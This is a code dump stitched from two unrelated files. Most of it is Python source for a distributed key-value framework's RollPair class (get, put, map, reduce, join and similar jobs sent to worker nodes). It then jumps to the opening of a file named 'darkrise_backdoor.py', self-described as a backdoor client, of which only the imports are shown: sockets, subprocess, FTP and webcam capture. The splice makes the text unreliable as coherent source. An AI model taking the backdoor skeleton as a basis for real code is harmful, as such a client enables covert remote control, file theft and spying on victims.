pp = ErPartition(id=p._id, store_locator=p._store_locator, processor=self.route_to_egg(p))
populated_partitions.append(pp)
return ErStore(store_locator=store._store_locator, partitions=populated_partitions, options=store._options)
def load(self, namespace=None, name=None, options: dict = None):
if options is None:
options = {}
store_type = options.get('store_type', self.default_store_type)
total_partitions = options.get('total_partitions', 1)
partitioner = options.get('partitioner', PartitionerTypes.BYTESTRING_HASH)
store_serdes = options.get('serdes', self.default_store_serdes)
create_if_missing = options.get('create_if_missing', True)
# todo:1: add combine options to pass it through
store_options = self.__session.get_all_options()
store_options.update(options)
final_options = store_options.copy()
# TODO:1: tostring in er model
if 'create_if_missing' in final_options:
del final_options['create_if_missing']
# TODO:1: remove these codes by adding to string logic in ErStore
if 'include_key' in final_options:
del final_options['include_key']
if 'total_partitions' in final_options:
del final_options['total_partitions']
if 'name' in final_options:
del final_options['name']
if 'namespace' in final_options:
del final_options['namespace']
# TODO:1: remove these codes by adding to string logic in ErStore
if 'keys_only' in final_options:
del final_options['keys_only']
# TODO:0: add 'error_if_exist, persistent / default store type'
L.info("final_options:{}".format(final_options))
store = ErStore(
store_locator=ErStoreLocator(
store_type=store_type,
namespace=namespace,
name=name,
total_partitions=total_partitions,
partitioner=partitioner,
serdes=store_serdes),
options=final_options)
if create_if_missing:
result = self.__session._cluster_manager_client.get_or_create_store(store)
else:
result = self.__session._cluster_manager_client.get_store(store)
if result is None:
raise EnvironmentError(
"result is None, please check whether the store:{} has been created before".format(store))
return RollPair(self.populate_processor(result), self)
# TODO:1: separates load parameters and put all parameters
def parallelize(self, data, options: dict = None):
if options is None:
options = {}
namespace = options.get("namespace", None)
name = options.get("name", None)
options['store_type'] = options.get("store_type", StoreTypes.ROLLPAIR_IN_MEMORY)
create_if_missing = options.get("create_if_missing", True)
if namespace is None:
namespace = self.session_id
if name is None:
name = str(uuid.uuid1())
rp = self.load(namespace=namespace, name=name, options=options)
return rp.put_all(data, options=options)
'''store name only supports full name and reg: *, *abc ,abc* and a*c'''
def cleanup(self, namespace, name, options: dict = None):
if not namespace:
raise ValueError('namespace cannot be blank')
L.info(f'cleaning up namespace={namespace}, name={name}')
if options is None:
options = {}
total_partitions = options.get('total_partitions', 1)
partitioner = options.get('partitioner', PartitionerTypes.BYTESTRING_HASH)
store_serdes = options.get('serdes', self.default_store_serdes)
if name == '*':
store_type = options.get('store_type', '*')
L.info(f'cleaning up whole store_type={store_type}, namespace={namespace}, name={name}')
er_store = ErStore(store_locator=ErStoreLocator(namespace=namespace,
name=name,
store_type=store_type))
job_id = generate_job_id(namespace, tag=RollPair.CLEANUP)
job = ErJob(id=job_id,
name=RollPair.DESTROY,
inputs=[er_store],
options=options)
args = list()
cleanup_partitions = [ErPartition(id=-1, store_locator=er_store._store_locator)]
for server_node, eggs in self.__session._eggs.items():
egg = eggs[0]
task = ErTask(id=generate_task_id(job_id, egg._command_endpoint._host),
name=job._name,
inputs=cleanup_partitions,
job=job)
args.append(([task], egg._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErTask],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
for future in futures:
result = future.result()
self.get_session()._cluster_manager_client.delete_store(er_store)
else:
# todo:1: add combine options to pass it through
store_options = self.__session.get_all_options()
store_options.update(options)
final_options = store_options.copy()
# TODO:1: tostring in er model
if 'create_if_missing' in final_options:
del final_options['create_if_missing']
# TODO:1: remove these codes by adding to string logic in ErStore
if 'include_key' in final_options:
del final_options['include_key']
if 'total_partitions' in final_options:
del final_options['total_partitions']
if 'name' in final_options:
del final_options['name']
if 'namespace' in final_options:
del final_options['namespace']
# TODO:1: remove these codes by adding to string logic in ErStore
if 'keys_only' in final_options:
del final_options['keys_only']
# TODO:0: add 'error_if_exist, persistent / default store type'
L.info("final_options:{}".format(final_options))
store = ErStore(
store_locator=ErStoreLocator(
store_type=StoreTypes.ROLLPAIR_LMDB,
namespace=namespace,
name=name,
total_partitions=total_partitions,
partitioner=partitioner,
serdes=store_serdes),
options=final_options)
results = self.__session._cluster_manager_client.get_store_from_namespace(store)
L.debug('res:{}'.format(results._stores))
if results._stores is not None:
L.debug("item count:{}".format(len(results._stores)))
for item in results._stores:
L.debug("item namespace:{} name:{}".format(item._store_locator._namespace,
item._store_locator._name))
rp = RollPair(er_store=item, rp_ctx=self)
rp.destroy()
def default_partitioner(k):
return 0
def default_egg_router(k):
return 0
class RollPair(object):
ROLL_PAIR_URI_PREFIX = 'v1/roll-pair'
EGG_PAIR_URI_PREFIX = 'v1/egg-pair'
RUN_JOB = 'runJob'
RUN_TASK = 'runTask'
AGGREGATE = 'aggregate'
COLLAPSE_PARTITIONS = 'collapsePartitions'
CLEANUP = 'cleanup'
COUNT = 'count'
DELETE = "delete"
DESTROY = "destroy"
FILTER = 'filter'
FLAT_MAP = 'flatMap'
GET = "get"
GET_ALL = "getAll"
GLOM = 'glom'
JOIN = 'join'
MAP = 'map'
MAP_PARTITIONS = 'mapPartitions'
MAP_VALUES = 'mapValues'
PUT = "put"
PUT_ALL = "putAll"
REDUCE = 'reduce'
SAMPLE = 'sample'
SUBTRACT_BY_KEY = 'subtractByKey'
UNION = 'union'
SERIALIZED_NONE = cloudpickle.dumps(None)
def __setstate__(self, state):
self.gc_enable = None
pass
def __getstate__(self):
pass
def __init__(self, er_store: ErStore, rp_ctx: RollPairContext):
if not rp_ctx:
raise ValueError('rp_ctx cannot be None')
self.__store = er_store
self.ctx = rp_ctx
self.__command_serdes = SerdesTypes.PROTOBUF
self.__roll_pair_master = self.ctx.get_roll()
self.__command_client = CommandClient()
self.functor_serdes =create_serdes(SerdesTypes.CLOUD_PICKLE)
self.value_serdes = self.get_store_serdes()
self.key_serdes = self.get_store_serdes()
self.partitioner = partitioner(hash_code, self.__store._store_locator._total_partitions)
self.egg_router = default_egg_router
self.__session_id = self.ctx.session_id
self.gc_enable = rp_ctx.rpc_gc_enable
self.gc_recorder = rp_ctx.gc_recorder
self.gc_recorder.record(er_store)
self.destroyed = False
def __del__(self):
if "EGGROLL_GC_DISABLE" in os.environ and os.environ["EGGROLL_GC_DISABLE"] == '1':
L.debug("global RollPair gc is disable")
return
if not hasattr(self, 'gc_enable') \
or not hasattr(self, 'ctx'):
return
if not self.gc_enable:
L.info('session:{} gc not enable'.format(self.__session_id))
return
if self.destroyed:
return
if self.ctx.get_session().is_stopped():
L.debug('session:{} has already been stopped'.format(self.__session_id))
return
L.debug(f"del obj addr:{self} calling")
self.ctx.gc_recorder.decrease_ref_count(self.__store)
def __repr__(self):
return f'<RollPair(_store={self.__store}) at {hex(id(self))}>'
def __repartition_with(self, other):
self_partition = self.get_partitions()
other_partition = other.get_partitions()
if other_partition != self_partition:
self_name = self.get_name()
self_count = self.count()
other_name = other.get_name()
other_count = other.count()
L.info(f"repartition start: partitions of rp: {self_name}: {self_partition}, "
f"other: {other_name}: {other_partition}, repartitioning")
if self_count <= other_count:
shuffle_rp = self
shuffle_rp_count = self_count
shuffle_rp_name = self_name
shuffle_rp_partition = self_partition
not_shuffle_rp = other
not_shuffle_rp_count = other_count
not_shuffle_rp_name = other_name
not_shuffle_rp_partition = other_partition
else:
not_shuffle_rp = self
not_shuffle_rp_count = self_count
not_shuffle_rp_name = self_name
not_shuffle_rp_partition = self_partition
shuffle_rp = other
shuffle_rp_count = other_count
shuffle_rp_name = other_name
shuffle_rp_partition = other_partition
L.debug(f"repatition selection: rp: {shuffle_rp_name} count:{shuffle_rp_count} "
f"<= rp: {not_shuffle_rp_name} count:{not_shuffle_rp_count}. "
f"repartitioning {shuffle_rp_name}")
store = ErStore(store_locator=ErStoreLocator(store_type=shuffle_rp.get_store_type(),
namespace=shuffle_rp.get_namespace(),
name=str(uuid.uuid1()),
total_partitions=not_shuffle_rp_partition))
res_rp = shuffle_rp.map(lambda k, v: (k, v), output=store)
res_rp.disable_gc()
L.debug(f"repartition end: rp to shuffle: {shuffle_rp_name}, "
f"count: {shuffle_rp_count}, partitions: {shuffle_rp_partition}; "
f"rp NOT shuffle: {not_shuffle_rp_name}, "
f"count: {not_shuffle_rp_count}, partitions: {not_shuffle_rp_partition}' "
f"res rp: {res_rp.get_name()}, "
f"count: {res_rp.count()}, partitions :{res_rp.get_partitions()}")
store_shuffle = res_rp.get_store()
return [store_shuffle, other.get_store()] if self_count <= other_count \
else [self.get_store(), store_shuffle]
else:
return [self.__store, other.__store]
def enable_gc(self):
self.gc_enable = True
def disable_gc(self):
self.gc_enable = False
def get_store_serdes(self):
return create_serdes(self.__store._store_locator._serdes)
def get_partitions(self):
return self.__store._store_locator._total_partitions
def get_name(self):
return self.__store._store_locator._name
def get_namespace(self):
return self.__store._store_locator._namespace
def get_store(self):
return self.__store
def get_store_type(self):
return self.__store._store_locator._store_type
def kv_to_bytes(self, **kwargs):
use_serialize = kwargs.get("use_serialize", True)
# can not use is None
if "k" in kwargs and "v" in kwargs:
k, v = kwargs["k"], kwargs["v"]
return (self.value_serdes.serialize(k), self.value_serdes.serialize(v)) if use_serialize \
else (string_to_bytes(k), string_to_bytes(v))
elif "k" in kwargs:
k = kwargs["k"]
return self.value_serdes.serialize(k) if use_serialize else string_to_bytes(k)
elif "v" in kwargs:
v = kwargs["v"]
return self.value_serdes.serialize(v) if use_serialize else string_to_bytes(v)
"""
storage api
"""
@_method_profile_logger
def get(self, k, options: dict = None):
if options is None:
options = {}
L.debug(f"get k: {k}")
k = create_serdes(self.__store._store_locator._serdes).serialize(k)
er_pair = ErPair(key=k, value=None)
outputs = []
value = None
partition_id = self.partitioner(k)
egg = self.ctx.route_to_egg(self.__store._partitions[partition_id])
L.info(f"partitions count: {self.__store._store_locator._total_partitions}, target partition: {partition_id}, endpoint: {egg._command_endpoint}")
inputs = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
output = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
job_id = generate_job_id(self.__session_id, RollPair.GET)
job = ErJob(id=job_id,
name=RollPair.GET,
inputs=[self.__store],
outputs=outputs,
functors=[ErFunctor(body=cloudpickle.dumps(er_pair))])
task = ErTask(id=generate_task_id(job_id, partition_id),
name=RollPair.GET,
inputs=inputs,
outputs=output,
job=job)
job_resp = self.__command_client.simple_sync_send(
input=task,
output_type=ErPair,
endpoint=egg._command_endpoint,
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'),
serdes_type=self.__command_serdes
)
return self.value_serdes.deserialize(job_resp._value) if job_resp._value != b'' else None
@_method_profile_logger
def put(self, k, v, options: dict = None):
if options is None:
options = {}
k, v = create_serdes(self.__store._store_locator._serdes).serialize(k), \
create_serdes(self.__store._store_locator._serdes).serialize(v)
er_pair = ErPair(key=k, value=v)
outputs = []
partition_id = self.partitioner(k)
egg = self.ctx.route_to_egg(self.__store._partitions[partition_id])
inputs = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
output = [ErPartition(id=0, store_locator=self.__store._store_locator)]
job_id = generate_job_id(self.__session_id, RollPair.PUT)
job = ErJob(id=job_id,
name=RollPair.PUT,
inputs=[self.__store],
outputs=outputs,
functors=[ErFunctor(body=cloudpickle.dumps(er_pair))])
task = ErTask(id=generate_task_id(job_id, partition_id),
name=RollPair.PUT,
inputs=inputs,
outputs=output,
job=job)
L.info("start send req")
job_resp = self.__command_client.simple_sync_send(
input=task,
output_type=ErPair,
endpoint=egg._command_endpoint,
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'),
serdes_type=self.__command_serdes
)
L.info("get resp:{}".format((job_resp._value)))
value = job_resp._value
return value
@_method_profile_logger
def get_all(self, options: dict = None):
if options is None:
options = {}
L.info('get all functor')
job_id = generate_job_id(self.__session_id, RollPair.GET_ALL)
def send_command():
job = ErJob(id=job_id,
name=RollPair.GET_ALL,
inputs=[self.__store],
outputs=[self.__store],
functors=[])
result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=SerdesTypes.PROTOBUF)
return result
send_command()
populated_store = self.ctx.populate_processor(self.__store)
transfer_pair = TransferPair(transfer_id=job_id)
done_cnt = 0
for k, v in transfer_pair.gather(populated_store):
done_cnt += 1
yield self.key_serdes.deserialize(k), self.value_serdes.deserialize(v)
L.debug(f"get_all count:{done_cnt}")
@_method_profile_logger
def put_all(self, items, output=None, options: dict = None):
if options is None:
options = {}
include_key = options.get("include_key", True)
job_id = generate_job_id(self.__session_id, RollPair.PUT_ALL)
# TODO:1: consider multiprocessing scenario. parallel size should be sent to egg_pair to set write signal count
def send_command():
job = ErJob(id=job_id,
name=RollPair.PUT_ALL,
inputs=[self.__store],
outputs=[self.__store],
functors=[])
result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=SerdesTypes.PROTOBUF)
return result
th = Thread(target=send_command, name=f'roll_pair-send_command-{job_id}')
th.start()
populated_store = self.ctx.populate_processor(self.__store)
shuffler = TransferPair(job_id)
broker = FifoBroker()
bb = BatchBroker(broker)
scatter_future = shuffler.scatter(broker, self.partitioner, populated_store)
key_serdes = self.key_serdes
value_serdes = self.value_serdes
try:
if include_key:
for k, v in items:
bb.put(item=(key_serdes.serialize(k), value_serdes.serialize(v)))
else:
k = 0
for v in items:
bb.put(item=(key_serdes.serialize(k), value_serdes.serialize(v)))
k += 1
finally:
bb.signal_write_finish()
scatter_results = scatter_future.result()
L.debug(f"scatter_results: {scatter_results}")
th.join()
return RollPair(populated_store, self.ctx)
@_method_profile_logger
def count(self):
total_partitions = self.__store._store_locator._total_partitions
job_id = generate_job_id(self.__session_id, tag=RollPair.COUNT)
job = ErJob(id=job_id,
name=RollPair.COUNT,
inputs=[self.ctx.populate_processor(self.__store)])
args = list()
for i in range(total_partitions):
partition_input = job._inputs[0]._partitions[i]
task = ErTask(id=generate_task_id(job_id, i),
name=job._name,
inputs=[partition_input],
job=job)
args.append(([task], partition_input._processor._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErPair],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
done = wait(futures, return_when=FIRST_EXCEPTION).done
result = 0
for future in done:
pair = future.result()[0]
result += self.functor_serdes.deserialize(pair._value)
return result
# todo:1: move to command channel to utilize batch command
@_method_profile_logger
def destroy(self):
if len(self.ctx.get_session()._cluster_manager_client.get_store(self.get_store())._partitions) == 0:
L.info(f"store:{self.get_store()} has been destroyed before")
raise ValueError(f"store:{self.get_store()} has been destroyed before")
total_partitions = self.__store._store_locator._total_partitions
job = ErJob(id=generate_job_id(self.__session_id, RollPair.DESTROY),
name=RollPair.DESTROY,
inputs=[self.__store],
outputs=[self.__store],
functors=[])
job_resp = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
self.ctx.get_session()._cluster_manager_client.delete_store(self.__store)
L.info(f'{RollPair.DESTROY}: {self.__store}')
self.destroyed = True
@_method_profile_logger
def delete(self, k, options: dict = None):
if options is None:
options = {}
key = create_serdes(self.__store._store_locator._serdes).serialize(k)
er_pair = ErPair(key=key, value=None)
outputs = []
value = None
partition_id = self.partitioner(key)
egg = self.ctx.route_to_egg(self.__store._partitions[partition_id])
L.info(egg._command_endpoint)
L.info(f"count: {self.__store._store_locator._total_partitions}")
inputs = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
output = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
job_id = generate_job_id(self.__session_id, RollPair.DELETE)
job = ErJob(id=job_id,
name=RollPair.DELETE,
inputs=[self.__store],
outputs=outputs,
functors=[ErFunctor(body=cloudpickle.dumps(er_pair))])
task = ErTask(id=generate_task_id(job_id, partition_id), name=RollPair.DELETE, inputs=inputs, outputs=output, job=job)
L.info("start send req")
job_resp = self.__command_client.simple_sync_send(
input=task,
output_type=ErPair,
endpoint=egg._command_endpoint,
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'),
serdes_type=self.__command_serdes
)
@_method_profile_logger
def take(self, n: int, options: dict = None):
if options is None:
options = {}
if n <= 0:
n = 1
keys_only = options.get("keys_only", False)
ret = []
count = 0
for item in self.get_all():
if keys_only:
if item:
ret.append(item[0])
else:
ret.append(None)
else:
ret.append(item)
count += 1
if count == n:
break
return ret
@_method_profile_logger
def first(self, options: dict = None):
if options is None:
options = {}
resp = self.take(1, options=options)
if resp:
return resp[0]
else:
return None
@_method_profile_logger
def save_as(self, name, namespace, partition, options: dict = None):
if partition <= 0:
raise ValueError('partition cannot <= 0')
if options is None:
options = {}
store_type = options.get('store_type', self.ctx.default_store_type)
if partition == self.get_partitions():
store = ErStore(store_locator=ErStoreLocator(store_type=store_type, namespace=namespace,
name=name, total_partitions=self.get_partitions()))
return self.map_values(lambda v: v, output=store)
else:
store = ErStore(store_locator=ErStoreLocator(store_type=store_type, namespace=namespace,
name=name, total_partitions=partition))
return self.map(lambda k, v: (k, v), output=store)
"""
computing api
"""
@_method_profile_logger
def map_values(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.MAP_VALUES, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
# todo:1: options issues. refer to line 77
final_options = {}
final_options.update(self.__store._options)
final_options.update(options)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.MAP_VALUES),
name=RollPair.MAP_VALUES,
inputs=[self.__store],
outputs=outputs,
functors=[functor],
options=final_options)
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def map(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.MAP, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.MAP),
name=RollPair.MAP,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def map_partitions(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.MAP_PARTITIONS, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.MAP_PARTITIONS),
name=RollPair.MAP_PARTITIONS,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes
)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def collapse_partitions(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.COLLAPSE_PARTITIONS, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.COLLAPSE_PARTITIONS),
name=RollPair.COLLAPSE_PARTITIONS,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes
)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def flat_map(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.FLAT_MAP, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.FLAT_MAP),
name=RollPair.FLAT_MAP,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes
)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def reduce(self, func, output=None, options: dict = None):
total_partitions = self.__store._store_locator._total_partitions
job_id = generate_job_id(self.__session_id, tag=RollPair.REDUCE)
serialized_func = ErFunctor(name=RollPair.REDUCE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
job = ErJob(id=job_id,
name=RollPair.REDUCE,
inputs=[self.ctx.populate_processor(self.__store)],
functors=[serialized_func])
args = list()
for i in range(total_partitions):
partition_input = job._inputs[0]._partitions[i]
task = ErTask(id=generate_task_id(job_id, i),
name=job._name,
inputs=[partition_input],
job=job)
args.append(([task], partition_input._processor._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErPair],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
done = wait(futures, return_when=FIRST_EXCEPTION).done
result = None
first = True
for future in done:
pair = future.result()[0]
seq_op_result = self.functor_serdes.deserialize(pair._value)
if seq_op_result is not None:
if not first:
result = func(result, seq_op_result)
else:
result = seq_op_result
first = False
return result
@_method_profile_logger
def aggregate(self, zero_value, seq_op, comb_op, output=None, options: dict = None):
total_partitions = self.__store._store_locator._total_partitions
job_id = generate_job_id(self.__session_id, tag=RollPair.AGGREGATE)
serialized_zero_value = ErFunctor(name=RollPair.AGGREGATE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(zero_value))
serialized_seq_op = ErFunctor(name=RollPair.AGGREGATE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(seq_op))
job = ErJob(id=job_id,
name=RollPair.AGGREGATE,
inputs=[self.ctx.populate_processor(self.__store)],
functors=[serialized_zero_value, serialized_seq_op])
args = list()
for i in range(total_partitions):
partition_input = job._inputs[0]._partitions[i]
task = ErTask(id=generate_task_id(job_id, i),
name=job._name,
inputs=[partition_input],
job=job)
args.append(([task], partition_input._processor._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErPair],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
done = wait(futures, return_when=FIRST_EXCEPTION).done
result = None
first = True
for future in done:
pair = future.result()[0]
seq_op_result = self.functor_serdes.deserialize(pair._value)
if not first:
result = comb_op(result, seq_op_result)
else:
result = seq_op_result
first = False
return result
@_method_profile_logger
def glom(self, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.GLOM, serdes=SerdesTypes.CLOUD_PICKLE)
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.GLOM),
name=RollPair.GLOM,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes
)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def sample(self, fraction, seed=None, output=None, options: dict = None):
if options is None:
options = {}
er_fraction = ErFunctor(name=RollPair.REDUCE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(fraction))
er_seed = ErFunctor(name=RollPair.REDUCE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(seed))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.SAMPLE),
name=RollPair.SAMPLE,
inputs=[self.__store],
outputs=outputs,
functors=[er_fraction, er_seed])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def filter(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.FILTER, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.FILTER),
name=RollPair.FILTER,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def subtract_by_key(self, other, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.SUBTRACT_BY_KEY, serdes=SerdesTypes.CLOUD_PICKLE)
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.SUBTRACT_BY_KEY),
name=RollPair.SUBTRACT_BY_KEY,
inputs=self.__repartition_with(other),
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def union(self, other, func=lambda v1, v2: v1, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.UNION, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.UNION),
name=RollPair.UNION,
inputs=self.__repartition_with(other),
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def join(self, other, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.JOIN, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
final_options = {}
final_options.update(self.__store._options)
final_options.update(options)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.JOIN),
name=RollPair.JOIN,
inputs=self.__repartition_with(other),
outputs=outputs,
functors=[functor],
options=final_options)
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def with_stores(self, func, others=None, options: dict = None):
if options is None:
options = {}
tag = "withStores"
if others is None:
others = []
total_partitions = self.get_partitions()
for other in others:
if other.get_partitions() != total_partitions:
raise ValueError(f"diff partitions: expected:{total_partitions}, actual:{other.get_partitions()}")
job_id = generate_job_id(self.__session_id, tag=tag)
job = ErJob(id=job_id,
name=tag,
inputs=[self.ctx.populate_processor(rp.get_store()) for rp in [self] + others],
functors=[ErFunctor(name=tag, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))],
options=options)
args = list()
for i in range(total_partitions):
partition_self = job._inputs[0]._partitions[i]
task = ErTask(id=generate_task_id(job_id, i),
name=job._name,
inputs=[store._partitions[i] for store in job._inputs],
job=job)
args.append(([task], partition_self._processor._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErPair],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
result = list()
for future in futures:
ret_pair = future.result()[0]
result.append((self.functor_serdes.deserialize(ret_pair._key),
self.functor_serdes.deserialize(ret_pair._value)))
return result
|
darkrise_backdoor.py
|
#!/usr/bin/python2
#-*- coding:utf-8 -*-
#Author : Unamed - Backdoor
#Client File
import os
import socket
import subprocess
import requests
import json
import sys
import platform
import shutil
import shlex
from ftplib import FTP
from ftplib import FTP_TLS
import cv2
import time
from datetime import datetime
import webbrowser
